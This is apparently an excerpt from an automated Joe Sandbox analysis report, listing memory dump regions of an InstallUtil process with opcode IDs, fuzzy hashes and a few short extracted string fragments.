                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 25a16ff4a5bcd7fc1f74f88bd845b882daa65d2fd6d12b50a1eb15c48f2ef3bb
                                • Instruction ID: efdcfc1a646a44228a6446a86b103e76346ddd9051538496d4d6ce033406eaa1
                                • Opcode Fuzzy Hash: 25a16ff4a5bcd7fc1f74f88bd845b882daa65d2fd6d12b50a1eb15c48f2ef3bb
                                • Instruction Fuzzy Hash: E6916E30E102199FDF60DF68C890B9DB7B1FF89304F208699D549AB255DB70AA85CF92
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7840c56e00af96bebf6994c5c12e9f8a1679afc20fdf48477e9a49aea40d9e9c
                                • Instruction ID: 38018753481cec1d0a32a3e978880d9c8921e026a30649e030256f673c9de248
                                • Opcode Fuzzy Hash: 7840c56e00af96bebf6994c5c12e9f8a1679afc20fdf48477e9a49aea40d9e9c
                                • Instruction Fuzzy Hash: 3E914D30E102198BDF60DF68C890BADB7B1FF89304F208599D549BB355DB70AA85CF91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2780e25ad21d7062b11be49e18e88cb05a26fb03b3c26eb15bbdadb46cebc456
                                • Instruction ID: 17a864a654567b1205869b6eb9154d85ca5b88d80bf1c0583dcdeaea763e9a66
                                • Opcode Fuzzy Hash: 2780e25ad21d7062b11be49e18e88cb05a26fb03b3c26eb15bbdadb46cebc456
                                • Instruction Fuzzy Hash: 6A41B674E00245CBDB75CF68C4C0ABEFBA2FB45310F258DAADA19D7241C675E941C791
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5b7e21ff7457cc025a7226c48acebd97daa44d604cb3225de2b5fc24facfa50e
                                • Instruction ID: 9fd0403a7c6cbf2b762e351182b90bea39eda19f3f80b43fb10cdec99611e569
                                • Opcode Fuzzy Hash: 5b7e21ff7457cc025a7226c48acebd97daa44d604cb3225de2b5fc24facfa50e
                                • Instruction Fuzzy Hash: F2417071E00609CFDF60CEA9C8C0ABEF7B6EB84310F11496AD616D7250D771E8998B91
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d54949dcefef0a909302c89ba145281c7c48cc5adb204f9a7507fe95a3acf41
                                • Instruction ID: 4b9fd7b044b8b9b19cbfdbc99de5321fc009f66d05a07547b8af4069452e8143
                                • Opcode Fuzzy Hash: 7d54949dcefef0a909302c89ba145281c7c48cc5adb204f9a7507fe95a3acf41
                                • Instruction Fuzzy Hash: 8D415935E10118DFDB94CB99D884AFDB7B6EF88310F4580A6ED09E7261EB70AC51CB90
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93451aeb384c818676bcf2660193cec5aed381a062f959aa1641fdcbcce9ba2a
                                • Instruction ID: 33a29a1fd9ed3701fffa2d32b8673efc507ad383e05b43c12bd8a6e4e37be0dc
                                • Opcode Fuzzy Hash: 93451aeb384c818676bcf2660193cec5aed381a062f959aa1641fdcbcce9ba2a
                                • Instruction Fuzzy Hash: 7C315031E106059BDB55CF65D894AAEF7F2FF89300F218519E806EB354DB70AC46CB51
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 44441df3c341b536dd1c57765e6e09562242764f470763da53bed548cf3567c4
                                • Instruction ID: fac49459adfd6e6c5689c412e8f814d0912304e6bd933a37d2209daa4185434e
                                • Opcode Fuzzy Hash: 44441df3c341b536dd1c57765e6e09562242764f470763da53bed548cf3567c4
                                • Instruction Fuzzy Hash: 26316031E102099BDB55CF64D894AAEB7F2FF89300F218529E805EB394DF70AC46CB51
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 649c165182a23481617c8e32db3889dcaed89f09d852b0275305547c8768366e
                                • Instruction ID: 71c5ee2ae381928ff64cead51140c8858a01ab0cb40829bc06a0055765d4af11
                                • Opcode Fuzzy Hash: 649c165182a23481617c8e32db3889dcaed89f09d852b0275305547c8768366e
                                • Instruction Fuzzy Hash: 63218030E002189FCF68DB68DC449EEBBF5EF49310F1149A9EA0AE7350DA719941CFA1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286095830.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_100d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
                                • Instruction ID: 687392504a8df6364959c844a15efb463b1305f1ad171d1b705db70cf2823275
                                • Opcode Fuzzy Hash: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
                                • Instruction Fuzzy Hash: 6A21D371604204DFEB16DFA8D984B16BFA5EB84354F20C5A9E98D4B296C33AD406CB72
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 28dcdf06662899f7bd4b74b9521cac03d77614aa947c5588bfda9b677ab11084
                                • Instruction ID: cd2bafdffae97b988f5429f2f694e19e5450add8dab1a7901027140ab13a064f
                                • Opcode Fuzzy Hash: 28dcdf06662899f7bd4b74b9521cac03d77614aa947c5588bfda9b677ab11084
                                • Instruction Fuzzy Hash: B211A332B100295BDB54D6B8C8546BF72EA9BC8650F1184BAD80AE7344EE72DC0287D2
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 10ef9451ee2a0b17b96f90406556fe2b8332b31696304a0f09579dfb31410ea4
                                • Instruction ID: d93384c8964bb0144148d7f0c7629cf1a986ee00720e322e693668bb11e0594f
                                • Opcode Fuzzy Hash: 10ef9451ee2a0b17b96f90406556fe2b8332b31696304a0f09579dfb31410ea4
                                • Instruction Fuzzy Hash: 5C01F936B110191BDB4596B8C9512FF66EBDBC8661F0185BAD80AD7340ED62CC0683E3
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f9e6d03b1e4591ca9f1502d74e4b602c7e30c58661e04369acb6dbb3755bdd27
                                • Instruction ID: 9b792fa48c817dc214e0c04fbf1d07f63a4fea685e08146228476655df6b29ab
                                • Opcode Fuzzy Hash: f9e6d03b1e4591ca9f1502d74e4b602c7e30c58661e04369acb6dbb3755bdd27
                                • Instruction Fuzzy Hash: AA21D3B5D01259AFCB10DF9AD885ADEFFB8FB48710F10816AE918A7200C378A554CFE5
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b74967b78f37579798c0f7ff2a26a14cc5882d875b16c3d39fe612c739dcfa68
                                • Instruction ID: 39f7486be44f185ec7ee069a829c3df4a3eb654557549af06bbe0044803367ac
                                • Opcode Fuzzy Hash: b74967b78f37579798c0f7ff2a26a14cc5882d875b16c3d39fe612c739dcfa68
                                • Instruction Fuzzy Hash: 8501B136B101204BDB55D678D85473EBBEADFC9214F15886AE90ECB361ED65DC034392
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ae16e0bc8fdcef7145465d6f13eb8d910fd4c66226a91e2d215b4f01b3d5578
                                • Instruction ID: 3ee931053db2b1281bb8f69377f0114d45a4ee978fed547f41d8bdbd6e9e28d5
                                • Opcode Fuzzy Hash: 1ae16e0bc8fdcef7145465d6f13eb8d910fd4c66226a91e2d215b4f01b3d5578
                                • Instruction Fuzzy Hash: A721F4B5D012599FCB00DF9AD884ADEFBF4FB48310F10816AE918A7240C3746954CBE5
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286095830.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_100d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 71ea15a3db48f15bd8586a592fdbed05223a2e802ec7b629684331fa5f31c809
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 8711D075504280CFDB12CF94D5C4B15FFA2FB44314F24C6AAE84D4B696C33AD40ACB62
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dececcba830fa930e4241a728e346366e06b93f66db585ac473631110090e15
                                • Instruction ID: 7c7600b0a91ba1ae103d33c5e77971726dcdbb16e865cac0fff9fd842ee14aa0
                                • Opcode Fuzzy Hash: 1dececcba830fa930e4241a728e346366e06b93f66db585ac473631110090e15
                                • Instruction Fuzzy Hash: 4C016D32B100240BDB65957D9854B3FB7DADBC9714F25847AE90EC7354EDA5DC024392
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 618f34575e00f4bad4c1eaa0503ac67819119381edcfdb89783560a334975bd2
                                • Instruction ID: 3707339b53013e7e71cd5c3a3adca087f889edd9df7c83d2a3dc191045d88e59
                                • Opcode Fuzzy Hash: 618f34575e00f4bad4c1eaa0503ac67819119381edcfdb89783560a334975bd2
                                • Instruction Fuzzy Hash: BFF0A436E11128ABCF14CAD5EC409DDF779EB88251F004177E909A7210DB71841AC7A1
                                Memory Dump Source
                                • Source File: 00000004.00000002.3286025242.0000000000FFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FFD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_ffd000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b11f02a68f411c4a3375cdb957061d661e70c2c7db1a55af267d74239fc0910
                                • Instruction ID: 4ab26532fa45f0ba0ea630622414148d8efb88cc4b04789d97ee5cf3e8b2a735
                                • Opcode Fuzzy Hash: 3b11f02a68f411c4a3375cdb957061d661e70c2c7db1a55af267d74239fc0910
                                • Instruction Fuzzy Hash: 63F0C2714043449EE7208F06C884B62FFA8EF51734F18C45AEE0C4A296C27A9840CAB5
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a8eb0b622f4ed50d294a28c5e0e86695095ec4e1e904c8c79554325321da0c2e
                                • Instruction ID: 06dee433249ac15b6a268075a21598606fcfd7dc98a9f70ae163f62bcdb29558
                                • Opcode Fuzzy Hash: a8eb0b622f4ed50d294a28c5e0e86695095ec4e1e904c8c79554325321da0c2e
                                • Instruction Fuzzy Hash: EEF06571D192487FEF51CBB0CD0AAAA776DDB02214F1185EAE808DB241E1B5DA818761
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6e2bb0b0f53a8932eefd01e7f8a486f893ed8622574c78a66ca67547e4c28134
                                • Instruction ID: 54b9aac4acb4e9a545901cbf35d05707472703a05208f86d7621adf0fb636701
                                • Opcode Fuzzy Hash: 6e2bb0b0f53a8932eefd01e7f8a486f893ed8622574c78a66ca67547e4c28134
                                • Instruction Fuzzy Hash: 25E0C271E1010CABDF90CAB0C909B6E73ACE701214F2189F9DD08D7200E2B6CA418780
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$.5uq$/q\-$<q\-$Nq\-$Sq\-$hq\-$$]q$$]q$$]q$$]q$$]q$$]q$q\-$v\-
                                • API String ID: 0-3932888714
                                • Opcode ID: f51f54ea9d2a738e6a56e6eaef5707d96119eea5a925c4f518da41e17f9ea22f
                                • Instruction ID: 65c0e38c305cd62dd99dd42378486963b65407bd88a9c56731ee3552fa512486
                                • Opcode Fuzzy Hash: f51f54ea9d2a738e6a56e6eaef5707d96119eea5a925c4f518da41e17f9ea22f
                                • Instruction Fuzzy Hash: 9CF16E30B002099FDB58EFB5C5A06AEB7F6BF84740F218469D44A9B399DF749C46CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: OK\-$PK\-$bK\-$tK\-$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                • API String ID: 0-4028708143
                                • Opcode ID: 17236c406bd77c3ea9c84b2b12f79037f54b70785cda6886ef5f229786378bd9
                                • Instruction ID: 897dbdb7500424355e9cf879f721cf220aae3048c1bbb32509a0e29268a9b80c
                                • Opcode Fuzzy Hash: 17236c406bd77c3ea9c84b2b12f79037f54b70785cda6886ef5f229786378bd9
                                • Instruction Fuzzy Hash: AA917E30A002099FDF68EFA8D595BAE76F6EF84340F118469D846A7294DAB89C41CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ]\-$6]\-$LR]q$LR]q$R]\-$a]\-$q]\-$$]q$$]q
                                • API String ID: 0-3697922206
                                • Opcode ID: 40e02fd69aae445ec79a77acf290488da27cedf3d48a5de779e751b662f7d47d
                                • Instruction ID: 16b4cee87d1726eec5c7374931b7fd85097c447bf53efffe3b32a0a62cc3fb9b
                                • Opcode Fuzzy Hash: 40e02fd69aae445ec79a77acf290488da27cedf3d48a5de779e751b662f7d47d
                                • Instruction Fuzzy Hash: D761E031B002059FDB58EBA8C851A6EB7F6EF88750F1185A9E806DB3A5DE70DC01CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$$]q$$]q$$]q$$]q$]\-
                                • API String ID: 0-3199654863
                                • Opcode ID: 6a433e0f4303e183214529ddc8eb8ae7615e9e04de76f4eb19f4c3306b599256
                                • Instruction ID: 96f17bddefd89bbba9598e2e34ab1dee9ed50443058827a7969b3e411fb95185
                                • Opcode Fuzzy Hash: 6a433e0f4303e183214529ddc8eb8ae7615e9e04de76f4eb19f4c3306b599256
                                • Instruction Fuzzy Hash: 85B12B30F002099FDB59EBA8C5957AEB7F6EF84300F258469D406EB355DAB5DC82CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,E\-$3E\-$ME\-$SE\-$bE\-$kE\-$yE\-
                                • API String ID: 0-2142556206
                                • Opcode ID: 69a3e89175c4727a19ef96efaa2acdf4e686b797ae80a21c82ea047ad6436a51
                                • Instruction ID: c17728194eebebc60de00b242093eb2471c5c748f5b7c9374e1715c204e74e2e
                                • Opcode Fuzzy Hash: 69a3e89175c4727a19ef96efaa2acdf4e686b797ae80a21c82ea047ad6436a51
                                • Instruction Fuzzy Hash: 0D81D971B001066FEF589BB4D891B7E76F6AF84254F01C468D906EB384DFB8DC018B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: 'J\-$VJ\-$|J\-$$]q$$]q$$]q$$]q
                                • API String ID: 0-3129388554
                                • Opcode ID: b43d6840a4697935717e2d05dbf54d10cbb15fce4cce9fc183811382f59f51a5
                                • Instruction ID: 481a603b1fbd28316834e7c5afd6f400c855ce1a21d7587eb0de316ea916802a
                                • Opcode Fuzzy Hash: b43d6840a4697935717e2d05dbf54d10cbb15fce4cce9fc183811382f59f51a5
                                • Instruction Fuzzy Hash: 4C51B230F00605ABCFA89F68D9906BE73F6EF84210F1185AAD846E7254DB79EC01CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: &B\-$6B\-$@C\-$IC\-$RC\-$kB\-
                                • API String ID: 0-1245943403
                                • Opcode ID: 19362d4db7b9cdab3b26e2996fde69783f64db4ccfe0e77459856e7a8418e8ce
                                • Instruction ID: d2e3b8417637ecbf6034d89b0b4d72792f591bb1a579cfaf01cdc77360fcea11
                                • Opcode Fuzzy Hash: 19362d4db7b9cdab3b26e2996fde69783f64db4ccfe0e77459856e7a8418e8ce
                                • Instruction Fuzzy Hash: 4EC16F30F002199FDB64DB74C851BAEB6F2AF89244F1085A9D40EEB355DE709D82CB91
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$n\\-$y\\-$$]q$$]q$]\-
                                • API String ID: 0-1591966148
                                • Opcode ID: 7fa618d49bab3396055f29df12a01679dc7befab05197cd1f1fb66063d95f8ad
                                • Instruction ID: 8e1e6ca3e56f57e913a433f5e5fa22b4e62a4dc7db1f1f7276359bf3d9af03f4
                                • Opcode Fuzzy Hash: 7fa618d49bab3396055f29df12a01679dc7befab05197cd1f1fb66063d95f8ad
                                • Instruction Fuzzy Hash: 83A15B30F002099BDB59EBA4C5917AEB7F6EF84300F25856DD406EB359DAB5DC82CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: {\-$"{\-$>{\-$Z{\-$x{\-$x\-
                                • API String ID: 0-3744525720
                                • Opcode ID: fe1cc6ba46c50834fd1dd8855bd9e3bcce7efb00e17564a02d356fa11eeb659f
                                • Instruction ID: cd1258833992ff34618382e7d1ecaa2f5964771ec77073c67e28c2322453eb25
                                • Opcode Fuzzy Hash: fe1cc6ba46c50834fd1dd8855bd9e3bcce7efb00e17564a02d356fa11eeb659f
                                • Instruction Fuzzy Hash: 4551E530F001096FDB58EBB8D4917BD76F6EF88254F118169D90AEB784EFB19D028792
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$.5uq$Nq\-$Sq\-$hq\-$q\-
                                • API String ID: 0-2365089651
                                • Opcode ID: 347e9112a6c0543a39df005fa9d202d9b03a08fc867af2a0caf0a17cf99c71d6
                                • Instruction ID: a23570ae21c961c4b4abeea594b3c59181d5d43d38d855b90727f8cbcdcd2a67
                                • Opcode Fuzzy Hash: 347e9112a6c0543a39df005fa9d202d9b03a08fc867af2a0caf0a17cf99c71d6
                                • Instruction Fuzzy Hash: 95615C70A013099FDF58EFA9C4607AEB7F6AF84740F208569D44AEB398DA709C41CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: =\\-$$]q$$]q$]\-
                                • API String ID: 0-1335456926
                                • Opcode ID: ae965024d37207db7563d558608b0d3e499a72c38d0bea88b84c66325eee7766
                                • Instruction ID: d7cd9190eb7f053a3fc7b827c1734d98eadc8f216b7d7d4e7772b19f09f3cd01
                                • Opcode Fuzzy Hash: ae965024d37207db7563d558608b0d3e499a72c38d0bea88b84c66325eee7766
                                • Instruction Fuzzy Hash: BA712930B002098FCB59EFA4C5916AEB7F6AF84304F25C4A9D846DB359DB75DC82CB81
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.3292294274.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_6750000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ^\-$/^\-$0^\-$t^\-
                                • API String ID: 0-1740364902
                                • Opcode ID: 8aff961413d2dfbf32b17478e9a56b616039fb09750ef44c2b0e4812d7800afa
                                • Instruction ID: dc042b5cf07334594dccbcc56b80c901840028a7c58ee20c1bd936b8d974e60b
                                • Opcode Fuzzy Hash: 8aff961413d2dfbf32b17478e9a56b616039fb09750ef44c2b0e4812d7800afa
                                • Instruction Fuzzy Hash: 13412330B001154FCB88E779981576EB6EBAFC0390F058068D909CB3A5EEB4DE0683A7